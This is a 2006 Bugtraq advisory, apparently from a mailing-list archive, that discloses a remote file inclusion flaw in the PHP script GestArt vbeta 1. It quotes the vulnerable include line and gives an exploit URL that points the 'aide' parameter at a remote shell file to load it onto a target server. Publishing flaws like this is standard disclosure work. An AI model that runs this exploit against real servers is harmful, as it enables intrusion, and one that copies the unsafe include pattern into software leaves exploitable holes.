GestArt <= vbeta 1 Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: GestArt <= vbeta 1 Remote File Include Vulnerabilities
From: ip.123.456.78.90@xxxxxxxxxxx
Date: 26 Oct 2006 02:31:51 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

GestArt  <= vbeta 1   Remote File Include Vulnerabilities

Found By : CoLd Zero  [ Wasem898 ]

Palestine Muslim Hacker's

Code : include("$4AZHAR.Team")

######################################################
#
#           [ GestArt  vbeta 1]
#
# Class:     Remote File Include Vulnerabilities
# Published  2006-10-25
# Remote:    Yes
# Critical   Level :  Dangerous
# Site: http://www.comscripts.com/scripts/php.gestart.642.html
# Author:    Cold Zero
# Contact:   ip.123.456.78.90@xxxxxxxxxxx
#
######################################################


file ;

/gestArt/aide.php


======================================================

Vuln Code:

<? include("$aide.txt");?>

=======================================================

Exploit :


Http:// www.Victem.0 / [WM-News_path[
/gestArt/aide.php3?aide=http://ColdZero-Shell.txt?





----  Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [Root Shell]
[o0xxdark0o]  ]organza[  [Huge] [H@MliT]


---- GreeTz: All www.4azhar.Com Members


Cont :  ip.123.456.78.90@xxxxxxxxxxx

Station : WWW.4AZHAR.COM
--------------------------------------||  Viva Palestine
||-----------------------------------------

Prev by Date: ArticleBeach Script <= 2.0 Remote File Inclusion Vulnerability
Next by Date: RFID enabled e-passport skimming proof of concept code released (RFIDIOt)
Previous by thread: ArticleBeach Script <= 2.0 Remote File Inclusion Vulnerability
Next by thread: RFID enabled e-passport skimming proof of concept code released (RFIDIOt)
Index(es):
- Date
- Thread